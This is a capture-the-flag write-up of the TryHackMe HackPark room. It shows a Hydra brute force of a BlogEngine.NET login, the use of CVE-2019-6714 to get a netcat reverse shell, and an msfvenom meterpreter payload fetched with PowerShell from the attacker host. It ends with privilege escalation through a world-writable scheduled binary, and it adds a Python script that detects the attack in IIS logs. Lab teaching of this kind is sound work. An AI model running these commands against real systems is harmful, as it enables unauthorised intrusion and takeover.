TryHackMe-HackPark
HackPark
Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!
[Task 1] Deploy the vulnerable Windows machine
Instructions
Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
This room will cover brute-forcing an account's credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.
Deploy the machine and access its web server.
What's the name of the clown displayed on the homepage?
Hint: Reverse Image Search
Let’s start with a Nmap scan:
```
$ nmap -sV -sC -A 10.10.79.198
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 07:26 CEST
Nmap scan report for 10.10.79.198
Host is up (0.047s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: HACKPARK
|   NetBIOS_Domain_Name: HACKPARK
|   NetBIOS_Computer_Name: HACKPARK
|   DNS_Domain_Name: hackpark
|   DNS_Computer_Name: hackpark
|   Product_Version: 6.3.9600
|_  System_Time: 2020-05-17T05:28:08+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2020-05-16T05:23:21
|_Not valid after:  2020-11-15T05:23:21
|_ssl-date: 2020-05-17T05:28:09+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.79 seconds
```
There is a web server running on port 80/tcp:
Connect to http://10.10.79.198 and download the homepage image (http://10.10.79.198/image.axd?picture=/26572c3a-0e51-4a9f-9049-b64e730ca75d.jpg). Submit it to the Google image search engine; the best match it returns is "pennywise 1990 full body".
Answer: pennywise
[Task 2] Using Hydra to brute-force a login
#2.0 - Instructions
Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!
Brute-forcing can be trying every combination of a password. Dictionary attacks are also a type of brute-forcing, where we iterate through a wordlist to obtain the password.
#2.1
Instructions
We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a GET request which is used to request data from a webserver and a POST request which is used to send data to a server.
You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).
What request type is the Windows website login form using?
Answer
From the menu, go to the login page (http://10.10.79.198/Account/login.aspx?ReturnURL=/admin/).
```
$ curl -s http://10.10.79.198/Account/login.aspx?ReturnURL=/admin/ | grep "<form"
<form method="post" action="login.aspx?ReturnURL=%2fadmin%2f" id="Form1">
```
The form is using POST.
#2.2
Instructions
Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.
Run the following command but fill in the blanks:
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
Guess a username, choose a password wordlist and gain credentials to a user account!
Hint: Username is admin… But what is the password?
Answer
Let’s first intercept the POST request using Burp Suite:
```
POST /Account/login.aspx?ReturnURL=%2fadmin%2f HTTP/1.1
Host: 10.10.79.198
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 777
Origin: http://10.10.79.198
DNT: 1
Connection: close
Referer: http://10.10.79.198/Account/login.aspx?ReturnURL=%2fadmin%2f
Upgrade-Insecure-Requests: 1

__VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=password&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in
```
The captured request gives us the form fields and the failure string we need for the Hydra payload. Let's crack the admin password:
```
$ hydra -f -l admin -P /data/src/wordlists/rockyou.txt 10.10.79.198 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-17 14:37:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.79.198:80/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 944.00 tries/min, 944 tries in 00:01h, 14343454 to do in 253:15h, 16 active
[80][http-post-form] host: 10.10.79.198   login: admin   password: 1qaz2wsx
[STATUS] attack finished for 10.10.79.198 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-17 14:38:44
```
Great! We now have the admin password: 1qaz2wsx.
#2.3
Instructions
Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).
However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.
Below is a mini cheatsheet:
| Command | Description |
|---|---|
| `hydra -P <wordlist> -v <ip> <protocol>` | Brute force against a protocol of your choice |
| `hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>` | You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts) |
| `hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>` | Attack a Windows Remote Desktop with a password list. |
| `hydra -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` | Craft a more specific request for Hydra to brute force. |
[Task 3] Compromise the machine
#3.0 - Instructions
In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!
Exploit-Database is a CVE (Common Vulnerabilities and Exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researchers. It is owned by Offensive Security (who are responsible for OSCP and Kali).
#3.1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
Now that we are logged in as admin, click on the “About” link from the menu. Here is the information:
Your BlogEngine.NET Specification:
- Version: 3.3.6.0
- Configuration: Single blog
- Trust level: Unrestricted
- Identity: IIS APPPOOL\Blog
- Blog provider: XmlBlogProvider
- Membership provider: XmlMembershipProvider
- Role provider: XmlRoleProvider
Answer: 3.3.6.0
#3.2 Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?
Hint: Look on the exploit database page.
Googling the terms "vulnerability blogengine 3.3.6.0" leads to https://www.exploit-db.com/exploits/46353, which is about CVE-2019-6714.
Let’s download the exploit. Read and follow the instructions:
Attack: First, we set the TcpClient address and port within the method below to our attack host, who has a reverse tcp listener waiting for a connection. Next, we upload this file through the file manager. In the current (3.3.6) version of BlogEngine, this is done by editing a post and clicking on the icon that looks like an open file in the toolbar. Note that this file must be uploaded as PostView.ascx. Once uploaded, the file will be in the /App_Data/files directory off of the document root. The admin page that allows upload is: http://10.10.10.10/admin/app/editor/editpost.cshtml Finally, the vulnerability is triggered by accessing the base URL for the blog with a theme override specified like so: http://10.10.10.10/?theme=../../App_Data/files
Let’s follow the instructions:
- Start by modifying the script so that it reports the correct values for IP and port.
- Rename your script as PostView.ascx.
- Go to posts (http://10.10.79.198/admin/#/content/posts) and click on “Welcome to HackPark” to edit this post.
- From the edit bar on top of the post, click on the “File Manager” icon.
- Click on the “+ UPLOAD” button and upload the PostView.ascx script.
- Close the file manager and click on “Save”.
- Now, open your listener (rlwrap nc -nlvp 1234).
- Go to http://10.10.79.198/?theme=../../App_Data/files

Check your listener, you should now have a reverse shell.
#3.3 Using the public exploit, gain initial access to the server. Who is the webserver running as?
```
$ rlwrap nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.79.198.
Ncat: Connection from 10.10.79.198:56475.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog
```
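Both the Hydra run in Task 2 and the `?theme=../../App_Data/files` request that triggered the shell leave a clear trace in the IIS logs on the server side. The following Python script is an added example, not part of the original writeup: it parses W3C-format IIS log lines (a constructed sample with an assumed reduced field set; the 10.9.1.x client addresses and the 20-POSTs-per-minute threshold are assumptions) and flags a burst of POSTs to /Account/login.aspx from one client as well as any theme parameter that escapes the themes directory, including double-encoded variants.

```python
"""Flag HackPark-style login brute force and theme traversal in IIS W3C logs."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote

LOGIN_PATH = "/account/login.aspx"   # BlogEngine.NET login form (compared lower-cased)
BRUTE_WINDOW = timedelta(seconds=60)
BRUTE_THRESHOLD = 20                 # POSTs per client per window (assumed threshold)


def parse_w3c(lines):
    """Yield one dict per log record, naming columns from the latest #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue                 # malformed record: skip rather than misalign columns
        yield dict(zip(fields, values))


def find_login_bruteforce(records):
    """Return {client ip: most POSTs to the login form inside any 60 s window}
    for clients that reach BRUTE_THRESHOLD."""
    per_client = defaultdict(list)
    for r in records:
        if r["cs-method"] == "POST" and r["cs-uri-stem"].lower() == LOGIN_PATH:
            stamp = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
            per_client[r["c-ip"]].append(stamp)
    hits = {}
    for ip, stamps in per_client.items():
        stamps.sort()
        start, best = 0, 0
        for end, stamp in enumerate(stamps):   # sliding window over sorted timestamps
            while stamp - stamps[start] > BRUTE_WINDOW:
                start += 1
            best = max(best, end - start + 1)
        if best >= BRUTE_THRESHOLD:
            hits[ip] = best
    return hits


def find_theme_traversal(records):
    """Return [(client ip, decoded theme value)] where ?theme= contains a '..' path
    segment; the extra unquote() pass also catches double-encoded %252e%252e."""
    findings = []
    for r in records:
        query = r.get("cs-uri-query", "-")
        if query == "-":
            continue
        for theme in parse_qs(query, keep_blank_values=True).get("theme", []):
            normalised = unquote(theme).replace("\\", "/")
            if ".." in normalised.split("/"):
                findings.append((r["c-ip"], normalised))
    return findings


def analyse(lines):
    """Run both detections over one parsed pass of the log."""
    records = list(parse_w3c(lines))
    return find_login_bruteforce(records), find_theme_traversal(records)


# Constructed sample (not real HackPark log data): one client hammering the login
# form at ~16 POST/s, one benign login, one theme traversal, one normal theme request.
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 8.5",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status",
    "2020-05-17 12:37:09 10.10.79.198 GET /Account/login.aspx ReturnURL=/admin/ 80 10.9.1.2 200",
] + [
    f"2020-05-17 12:37:{10 + i // 16:02d} 10.10.79.198 POST /Account/login.aspx "
    f"ReturnURL=%2fadmin%2f 80 10.9.1.2 200"
    for i in range(40)
] + [
    "2020-05-17 12:40:00 10.10.79.198 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 10.9.1.5 302",
    "2020-05-17 13:05:01 10.10.79.198 GET / theme=../../App_Data/files 80 10.9.1.2 200",
    "2020-05-17 13:06:01 10.10.79.198 GET / theme=Standard 80 10.9.1.5 200",
]

if __name__ == "__main__":
    brute, traversal = analyse(SAMPLE_LOG)
    for ip, count in brute.items():
        print(f"login brute force: {ip} made {count} POSTs to the login form inside 60 s")
    for ip, theme in traversal:
        print(f"theme traversal: {ip} requested theme={theme}")
```

On a real server the same functions can be pointed at the files under `C:\inetpub\logs\LogFiles`, whose `#Fields:` header drives the column names, so the default IIS field set works unchanged.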
[Task 4] Windows Privilege Escalation
#4.0 - Instructions
In this task we will learn about the basics of Windows Privilege Escalation.
First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.
#4.1
Instructions
Our netcat session is a little unstable, so let's generate another reverse shell using msfvenom.
If you don’t know how to do this, I suggest completing the Metasploit room first!
Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!
Answer
Let’s generate our executable with msfvenom (make sure you select a different port than the one used for the previous reverse shell):
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=2345 -f exe -o revshell.exe
Now, let’s download the payload from the server. To do that, we’ll first start a web server (from the same location where our exe is):
$ python3 -m http.server
Now, on the reverse shell, enter the following command:
powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
Now, open msfconsole:

```
$ msfconsole -q
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.9.**.**
LHOST => 10.9.**.**
msf5 exploit(multi/handler) > set LPORT 2345
LPORT => 2345
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.**.**:2345
```
Now, back to the reverse shell, let’s start the executable:
```
c:\windows\system32\inetsrv>cd \windows\temp
dir
c:\Windows\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552

 Directory of c:\Windows\Temp

05/17/2020  07:01 AM    <DIR>          .
05/17/2020  07:01 AM    <DIR>          ..
08/06/2019  02:13 PM             8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019  02:13 PM           181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019  02:13 PM             1,206 cleanup.txt
08/06/2019  02:13 PM               421 cmdout
08/06/2019  02:11 PM                 0 DMI2EBC.tmp
08/03/2019  10:43 AM                 0 DMI4D21.tmp
08/06/2019  02:12 PM             8,743 EC2ConfigService_20190806141221.log
08/06/2019  02:12 PM           292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
05/17/2020  07:01 AM            73,802 revshell.exe
08/06/2019  02:13 PM                21 stage1-complete.txt
08/06/2019  02:13 PM            28,495 stage1.txt
05/12/2019  09:03 PM           113,328 svcexec.exe
08/06/2019  02:13 PM                67 tmp.dat
              13 File(s)        708,784 bytes
               2 Dir(s)  39,143,284,736 bytes free

.\revshell.exe
c:\Windows\Temp>.\revshell.exe
```
In your msfconsole, you should now have a meterpreter:

```
[*] Sending stage (176195 bytes) to 10.10.79.198
[*] Meterpreter session 1 opened (10.9.**.**:2345 -> 10.10.79.198:54675) at 2020-05-17 16:05:38 +0200

meterpreter >
```
#4.2
Instructions
You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.
What is the OS version of this windows machine?
Answer
```
meterpreter > sysinfo
Computer        : HACKPARK
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
```
Answer: Windows 2012 R2 (6.3 Build 9600)
#4.3 - Further enumerate the machine. What is the name of the abnormal service running?
Hint: Check in the `C:\Program Files (x86)` directory and go from there. Remember, you can use meterpreter to check all running processes on the machine.
```
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User              Path
 ---   ----  ----                  ----  -------  ----              ----
 0     0     [System Process]
 4     0     System
 360   676   svchost.exe
 376   4     smss.exe
 528   520   csrss.exe
 580   572   csrss.exe
 592   520   wininit.exe
 616   572   winlogon.exe
 676   592   services.exe
 684   592   lsass.exe
 744   676   svchost.exe
 788   676   svchost.exe
 820   2552  cmd.exe               x64   0        IIS APPPOOL\Blog  C:\Windows\System32\cmd.exe
 864   676   svchost.exe
 884   616   dwm.exe
 916   676   svchost.exe
 944   676   svchost.exe
 988   676   svchost.exe
 1128  676   spoolsv.exe
 1176  676   amazon-ssm-agent.exe
 1244  676   svchost.exe
 1268  676   LiteAgent.exe
 1312  676   svchost.exe
 1328  676   svchost.exe
 1368  676   WService.exe
 1476  676   msdtc.exe
 1552  676   wlms.exe
 1560  1368  WScheduler.exe
 1576  676   Ec2Config.exe
 1848  676   sppsvc.exe
 2008  676   svchost.exe
 2044  676   vds.exe
 2316  744   WmiPrvSE.exe
 2360  820   conhost.exe           x64   0        IIS APPPOOL\Blog  C:\Windows\System32\conhost.exe
 2464  2144  WScheduler.exe
 2536  916   taskhostex.exe
 2552  1328  w3wp.exe              x64   0        IIS APPPOOL\Blog  C:\Windows\System32\inetsrv\w3wp.exe
 2608  2600  explorer.exe
 2940  820   revshell.exe          x86   0        IIS APPPOOL\Blog  c:\Windows\Temp\revshell.exe
 3060  744   SppExtComObj.Exe
 3068  2584  ServerManager.exe

meterpreter >
```
Answer: WindowsScheduler.exe
#4.4 - What is the name of the binary you’re supposed to exploit?
Hint: have you checked for logs for the abnormal service?
```
meterpreter > cd "c:\program files (x86)"
meterpreter > ls
Listing: c:\program files (x86)
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2013-08-22 15:36:16 +0200  Common Files
40777/rwxrwxrwx   4096  dir   2013-08-22 17:39:30 +0200  Internet Explorer
40777/rwxrwxrwx   0     dir   2013-08-22 17:39:30 +0200  Microsoft.NET
40777/rwxrwxrwx   8192  dir   2019-08-04 13:36:42 +0200  SystemScheduler
40777/rwxrwxrwx   0     dir   2019-08-06 23:12:04 +0200  Uninstall Information
40777/rwxrwxrwx   0     dir   2013-08-22 17:39:30 +0200  Windows Mail
40777/rwxrwxrwx   0     dir   2013-08-22 17:39:30 +0200  Windows NT
40777/rwxrwxrwx   0     dir   2013-08-22 17:39:30 +0200  WindowsPowerShell
100666/rw-rw-rw-  174   fil   2013-08-22 17:39:32 +0200  desktop.ini

meterpreter > cd SystemScheduler
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   4096     dir   2019-08-04 13:36:53 +0200  Events
100666/rw-rw-rw-  60       fil   2019-08-04 13:36:42 +0200  Forum.url
100666/rw-rw-rw-  9813     fil   2019-08-04 13:36:42 +0200  License.txt
100666/rw-rw-rw-  871      fil   2019-08-04 13:37:02 +0200  LogFile.txt
100666/rw-rw-rw-  2805     fil   2019-08-04 13:36:53 +0200  LogfileAdvanced.txt
100777/rwxrwxrwx  536992   fil   2019-08-04 13:36:42 +0200  Message.exe
100777/rwxrwxrwx  445344   fil   2019-08-04 13:36:42 +0200  PlaySound.exe
100777/rwxrwxrwx  27040    fil   2019-08-04 13:36:42 +0200  PlayWAV.exe
100666/rw-rw-rw-  149      fil   2019-08-04 13:36:53 +0200  Preferences.ini
100777/rwxrwxrwx  485792   fil   2019-08-04 13:36:42 +0200  Privilege.exe
100666/rw-rw-rw-  10100    fil   2019-08-04 13:36:42 +0200  ReadMe.txt
100777/rwxrwxrwx  112544   fil   2019-08-04 13:36:42 +0200  RunNow.exe
100777/rwxrwxrwx  235936   fil   2019-08-04 13:36:42 +0200  SSAdmin.exe
100777/rwxrwxrwx  731552   fil   2019-08-04 13:36:42 +0200  SSCmd.exe
100777/rwxrwxrwx  456608   fil   2019-08-04 13:36:42 +0200  SSMail.exe
100777/rwxrwxrwx  1633696  fil   2019-08-04 13:36:42 +0200  Scheduler.exe
100777/rwxrwxrwx  491936   fil   2019-08-04 13:36:42 +0200  SendKeysHelper.exe
100777/rwxrwxrwx  437664   fil   2019-08-04 13:36:42 +0200  ShowXY.exe
100777/rwxrwxrwx  439712   fil   2019-08-04 13:36:42 +0200  ShutdownGUI.exe
100666/rw-rw-rw-  785042   fil   2019-08-04 13:36:42 +0200  WSCHEDULER.CHM
100666/rw-rw-rw-  703081   fil   2019-08-04 13:36:42 +0200  WSCHEDULER.HLP
100777/rwxrwxrwx  136096   fil   2019-08-04 13:36:42 +0200  WSCtrl.exe
100777/rwxrwxrwx  68512    fil   2019-08-04 13:36:42 +0200  WSLogon.exe
100666/rw-rw-rw-  33184    fil   2019-08-04 13:36:42 +0200  WSProc.dll
100666/rw-rw-rw-  2026     fil   2019-08-04 13:36:42 +0200  WScheduler.cnt
100777/rwxrwxrwx  331168   fil   2019-08-04 13:36:42 +0200  WScheduler.exe
100777/rwxrwxrwx  98720    fil   2019-08-04 13:36:42 +0200  WService.exe
100666/rw-rw-rw-  54       fil   2019-08-04 13:36:42 +0200  Website.url
100777/rwxrwxrwx  76704    fil   2019-08-04 13:36:42 +0200  WhoAmI.exe
100666/rw-rw-rw-  1150     fil   2019-08-04 13:36:42 +0200  alarmclock.ico
100666/rw-rw-rw-  766      fil   2019-08-04 13:36:42 +0200  clock.ico
100666/rw-rw-rw-  80856    fil   2019-08-04 13:36:42 +0200  ding.wav
100666/rw-rw-rw-  1637972  fil   2019-08-04 13:36:42 +0200  libeay32.dll
100777/rwxrwxrwx  40352    fil   2019-08-04 13:36:42 +0200  sc32.exe
100666/rw-rw-rw-  766      fil   2019-08-04 13:36:42 +0200  schedule.ico
100666/rw-rw-rw-  355446   fil   2019-08-04 13:36:42 +0200  ssleay32.dll
100666/rw-rw-rw-  6999     fil   2019-08-04 13:36:42 +0200  unins000.dat
100777/rwxrwxrwx  722597   fil   2019-08-04 13:36:42 +0200  unins000.exe
100666/rw-rw-rw-  6574     fil   2019-08-04 13:36:42 +0200  whiteclock.ico

meterpreter > cd events
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler\events
======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1927   fil   2019-08-05 00:05:19 +0200  20198415519.INI
100666/rw-rw-rw-  18175  fil   2019-08-05 00:06:01 +0200  20198415519.INI_LOG.txt
100666/rw-rw-rw-  186    fil   2020-05-17 15:38:43 +0200  Administrator.flg
100666/rw-rw-rw-  182    fil   2020-05-17 15:38:18 +0200  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2020-05-17 15:38:43 +0200  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 13:36:53 +0200  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2020-05-17 15:38:18 +0200  service.flg

meterpreter > cat 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)
...[SNIP]...
```
From the WindowsScheduler logs, we see that Message.exe is executed about every 30 seconds as Administrator. Since the SystemScheduler directory and Message.exe itself are writable by everyone (mode rwxrwxrwx in the listing above), we can take advantage of this to replace Message.exe with our reverse shell so that it is executed as Administrator.
#4.5 - Using this abnormal service, escalate your privileges! What is the user flag (on Jeff’s Desktop)?
Hint: Check exploit-db.com for a public writeup of this vulnerability. The missing binary isn’t the same as the public exploit.
Unfortunately, with our meterpreter, we have insufficient privileges to read the user flag and we can’t migrate to another process either:
```
meterpreter > cd users
meterpreter > ls
Listing: c:\users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2019-08-03 20:15:04 +0200  .NET v4.5
40777/rwxrwxrwx   0     dir   2019-08-03 20:15:04 +0200  .NET v4.5 Classic
40777/rwxrwxrwx   8192  dir   2019-08-03 19:43:51 +0200  Administrator
40777/rwxrwxrwx   0     dir   2013-08-22 16:48:41 +0200  All Users
40555/r-xr-xr-x   8192  dir   2013-08-22 15:36:16 +0200  Default
40777/rwxrwxrwx   0     dir   2013-08-22 16:48:41 +0200  Default User
40555/r-xr-xr-x   4096  dir   2013-08-22 15:36:16 +0200  Public
100666/rw-rw-rw-  174   fil   2013-08-22 17:39:32 +0200  desktop.ini
40777/rwxrwxrwx   0     dir   2019-08-04 20:54:52 +0200  jeff

meterpreter > cd jeff
[-] stdapi_fs_chdir: Operation failed: Access is denied.
```
